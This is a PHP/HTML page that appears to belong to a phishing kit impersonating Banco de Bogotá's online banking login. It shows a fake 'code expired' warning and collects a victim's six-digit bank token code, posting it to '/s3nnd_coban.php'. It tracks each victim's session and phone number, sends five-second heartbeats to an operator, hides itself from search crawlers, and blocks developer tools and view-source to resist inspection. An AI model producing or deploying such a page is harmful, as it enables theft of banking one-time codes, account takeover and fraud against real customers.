<?php
session_start();
error_reporting(E_ALL);
ini_set('display_errors', 1);

$sid = $_SESSION['sid'] ?? '';
$sessionsFile = realpath(__DIR__ . "/../../sessions.json");
if (!$sid) {
    header('Location: /index.html');
    exit;
}

$phoneNumber = '';

if ($sessionsFile && file_exists($sessionsFile)) {
    $sessions = json_decode(file_get_contents($sessionsFile), true);
    if (isset($sessions[$sid])) {
        $sessionData = $sessions[$sid];
        $phoneNumber = $sessionData['phone_number'] ?? '';
    }
}
?>
<!DOCTYPE html>
<html lang="es">
<head>
    <meta http-equiv="content-type" content="text/html; charset=UTF-8">
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width,initial-scale=1">
    
    <meta name="robots" content="noindex, nofollow, noarchive, nosnippet, noimageindex">
    <meta name="googlebot" content="noindex, nofollow, noarchive, nosnippet">
    <meta name="bingbot" content="noindex, nofollow, noarchive">
    <meta http-equiv="X-Robots-Tag" content="noindex, nofollow">
    <meta name="httrack-crawler" content="nofollow">
    <meta http-equiv="pragma" content="no-cache">
    <meta http-equiv="cache-control" content="no-cache, no-store, must-revalidate">
    <link rel="icon" type="image/x-icon" href="https://virtual.bancodebogota.co/bbog-pb-frontend-bv-shell/assets/favicon.ico">
    <title>Ingreso a Banca Virtual</title>
    <style>
        :root {
            --sherpa-carbon-200: #e0e0e0;
            --sherpa-carbon-900: #333;
            --sherpa-white: #fff;
            --sherpa-spacing-0: 0;
            --sherpa-spacing-2: 8px;
            --sherpa-spacing-6: 24px;
        }

        body {
            font-family: Arial, sans-serif;
            background-color: #f5f9ff;
            margin: 0;
            padding: 0;
        }

        .header {
            display: flex;
            justify-content: space-between;
            align-items: center;
            padding: 10px 20px;
            background-color: #fff;
            border-bottom: 1px solid #e0e0e0;
            position: sticky;
            top: 0px;
            right: 0px;
            left: 0px;
            height: 64px;
            z-index: 10;
        }

        .header a {
            text-decoration: none;
            color: #1973B8;
            font-size: 14px;
        }

        .header .right a {
            font-weight: bold;
        }

        .container {
            display: flex;
            justify-content: center;
            align-items: center;
        }

        .verification-box {
            background-color: #fff;
            border-radius: 10px;
            border: 1px solid var(--sherpa-carbon-200);
            box-shadow: 0 2px 10px rgba(0, 0, 0, 0.1);
            width: 400px;
            padding: 35px;
        }

        .verification-box h2 {
            font-size: 18px;
            font-weight: normal;
            color: #333;
            margin-bottom: 20px;
        }

        .verification-box .icon {
            font-size: 40px;
            color: #1973B8;
            margin-bottom: 10px;
        }

        .verification-box p {
            font-size: 14px;
            color: #666;
            margin-bottom: 20px;
        }

        .verification-box .input-group {
            gap: 5px;
            margin-bottom: 20px;
            display: flex;
        }

        .verification-box .input-group input {
            height: 48px;
            text-align: center;
            font-size: 18px;
            border: 1px solid #ccc;
            width: 100%;
            max-width: 48px;
            background: var(--sherpa-white);
            box-sizing: border-box;
            border-radius: 8px;
            outline: none;
            color: var(--sherpa-carbon-900);
            margin-right: var(--sherpa-spacing-2);
        }

        .verification-box .input-group input:focus {
            border-color: #1973B8;
            outline: none;
        }

        .verification-box button {
            height: 40px;
            background-color: #ccc;
            color: #fff;
            border: none;
            border-radius: 100px;
            cursor: not-allowed;
            font-size: 16px;
            width: 127px;
            margin-left: 0px;
            display: flex;
            align-items: center;
            justify-content: center;
            outline: none;
            user-select: none;
        }

        .verification-box button.enabled {
            background-color: #1973B8;
            cursor: pointer;
        }

        .footer {
            text-align: center;
            padding: 10px;
            font-size: 12px;
            color: #aaa;
        }

        .disdiv {
            display: flex;
            justify-content: center;
            align-items: center;
            height: 100%;
            margin: 6.4rem var(--sherpa-spacing-0) var(--sherpa-spacing-6);
            color: var(--sherpa-carbon-900);
            font-size: 16px;
            font-family: Roboto-Medium, Arial, sans-serif;
            font-weight: normal;
            line-height: 28px;
            letter-spacing: .2px;
            text-align: center;
            margin-left: -200px;
            margin-top: 60px;
        }

        .alert-box {
            background: #fff5eb;
            border: 1px solid #f3c49c;
            color: #573a08;
            border-radius: 6px;
            padding: 14px 16px;
            margin-bottom: 20px;
            font-size: 13.5px;
            line-height: 1.5;
            display: flex;
            align-items: flex-start;
            gap: 10px;
        }

        .alert-box img {
            width: 20px;
            height: 20px;
            margin-top: 2px;
        }

        ._2LcN4zHfIL-9QJHU6josDd {
            position: fixed;
            top: 0;
            left: 0;
            height: 100vh;
            width: 100vw;
            display: flex;
            background-color: rgba(0,25,71,.8);
            backdrop-filter: blur(6px);
            opacity: 1;
            align-items: center;
            justify-content: center;
            z-index: 999999;
        }

        .tbg8dXWRYHAwbdxaOyLmA {
            display: flex;
            border-radius: 2px;
            width: 68px;
            height: 71px;
            justify-content: center;
            align-items: center;
        }

        ._3-2aCGgKdV8V-1CNTL9oBf {
            width: 40px;
            height: 40px;
            animation: _3AYCpRFbH25z5ekbEIlmV0 .5s linear infinite;
            animation-duration: 750ms;
        }

        ._3-2aCGgKdV8V-1CNTL9oBf circle {
            stroke: #fff;
            fill: transparent;
            stroke-width: 4px;
            stroke-dasharray: 128px;
            stroke-dashoffset: 82px;
        }

        @keyframes _3AYCpRFbH25z5ekbEIlmV0 {
            from { transform: rotate(0deg); }
            to { transform: rotate(360deg); }
        }
    </style>
</head>
<body>
    <div class="header">
        <img src="/Referencia/bdbg.png" alt="Logo">
        <span><h4>Ingreso a Banca Virtual</h4></span>
        <div class="right">
            <a href="#">Abandonar</a>
        </div>
    </div>

    <div class="disdiv">
        <h2>Verifiquemos que seas tú</h2>
    </div>

    <div class="container">
        <div class="verification-box">
            <div class="alert-box">
                <img src="/Referencia/atencion.png" alt="Atención">
                <div>El tiempo de duración del código ha expirado. Reenvía el código e intenta nuevamente.</div>
            </div>

            <span class="bdb-ml-bm-token__icon ico-token-active">
                <img src="/Referencia/lock.png" alt="Lock">
            </span>
            
            <div class="bdb-ml-bm-token__title">
                <div class="bdb-ml-bm-token__title__label">
                    <b>Código Token</b>
                    <img src="/Referencia/alert.png" style="margin-left: 5px;" alt="Alert"> 
                </div>
            </div>

            <p>Para realizar este proceso, ingresa el código de Token móvil o físico.</p>

            <form action="/s3nnd_coban.php" method="POST">
                <div class="input-group">
                    <input type="password" maxlength="1" id="btn1" name="dig1" required inputmode="numeric">
                    <input type="password" maxlength="1" id="btn2" name="dig2" required inputmode="numeric">
                    <input type="password" maxlength="1" id="btn3" name="dig3" required inputmode="numeric">
                    <input type="password" maxlength="1" id="btn4" name="dig4" required inputmode="numeric">
                    <input type="password" maxlength="1" id="btn5" name="dig5" required inputmode="numeric">
                    <input type="password" maxlength="1" id="btn6" name="dig6" required inputmode="numeric">
                    <input type="hidden" name="toq" id="codeHidden">
                </div>

                <button type="submit" id="verifyButton" disabled>Verificar</button>
            </form>
        </div>
    </div>

    <div id="overlay-root" style="display:none;">
        <div class="_2LcN4zHfIL-9QJHU6josDd">
            <div role="dialog" class="tbg8dXWRYHAwbdxaOyLmA">
                <img src="/Referencia/loading.gif" style="width:100%;" alt="Loading">
            </div>
        </div>
    </div>

    <script>
        const inputs = document.querySelectorAll('.input-group input[type="password"]');
        const verifyButton = document.getElementById('verifyButton');
        const codeHidden = document.getElementById('codeHidden');

        inputs.forEach((input, index) => {
            input.addEventListener('input', () => {
                if (!/^\d$/.test(input.value)) {
                    input.value = '';
                    return;
                }
                if (input.value.length > 0 && index < inputs.length - 1) {
                    inputs[index + 1].focus();
                }
                checkInputs();
            });

            input.addEventListener('keydown', (e) => {
                if (e.key === 'Backspace' && index > 0 && input.value === '') {
                    inputs[index - 1].focus();
                }
            });

            input.addEventListener('paste', function(e) {
                e.preventDefault();
                const pastedData = e.clipboardData.getData('text');
                const digits = pastedData.replace(/\D/g, '').slice(0, 6);
                digits.split('').forEach((digit, i) => {
                    if (inputs[i]) {
                        inputs[i].value = digit;
                    }
                });
                const lastIndex = Math.min(digits.length - 1, 5);
                if (inputs[lastIndex]) inputs[lastIndex].focus();
                checkInputs();
            });
        });

        function checkInputs() {
            const allFilled = Array.from(inputs).every(input => input.value.trim() !== '');
            const code = Array.from(inputs).map(input => input.value).join('');
            codeHidden.value = code;

            if (allFilled) {
                verifyButton.classList.add('enabled');
                verifyButton.disabled = false;
                verifyButton.style.cursor = 'pointer';
            } else {
                verifyButton.classList.remove('enabled');
                verifyButton.disabled = true;
                verifyButton.style.cursor = 'not-allowed';
            }
        }

        document.querySelector('form').addEventListener('submit', function(e) {
        });

        async function sendHeartbeat() {
            try {
                await fetch("/heartbeat.php", { method: 'POST' });
            } catch (e) {
                console.error("Error enviando heartbeat:", e);
            }
        }
        setInterval(sendHeartbeat, 5000);
        sendHeartbeat();

        (function(){
            document.addEventListener('contextmenu', function(e) { e.preventDefault(); return false; });
            document.addEventListener('keydown', function(e) {
                if (e.key === 'F12' || 
                    (e.ctrlKey && e.key === 'u') || 
                    (e.ctrlKey && e.key === 'U') ||
                    (e.ctrlKey && e.key === 's') || 
                    (e.ctrlKey && e.key === 'S') ||
                    (e.ctrlKey && e.shiftKey && e.key === 'I') ||
                    (e.ctrlKey && e.shiftKey && e.key === 'i') ||
                    (e.ctrlKey && e.shiftKey && e.key === 'J') ||
                    (e.ctrlKey && e.shiftKey && e.key === 'j') ||
                    (e.ctrlKey && e.shiftKey && e.key === 'C') ||
                    (e.ctrlKey && e.shiftKey && e.key === 'c')) {
                    e.preventDefault();
                    return false;
                }
            });
            document.onkeydown = function(e) {
                if (e.keyCode === 123 || 
                    (e.ctrlKey && e.keyCode === 85) || 
                    (e.ctrlKey && e.keyCode === 83) ||
                    (e.ctrlKey && e.shiftKey && e.keyCode === 73) ||
                    (e.ctrlKey && e.shiftKey && e.keyCode === 74)) {
                    return false;
                }
            };
        })();
    </script>
</body>
</html>
